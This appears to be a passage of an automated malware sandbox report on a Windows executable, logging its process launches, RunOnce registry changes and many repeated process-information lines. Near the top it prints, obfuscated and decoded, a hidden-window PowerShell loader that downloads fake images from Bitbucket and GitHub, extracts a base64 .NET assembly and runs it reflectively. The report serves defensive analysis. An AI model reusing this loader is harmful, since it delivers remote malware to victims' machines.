        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: OTO2wVGgkl.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6975A1D28
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF6975A1684
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
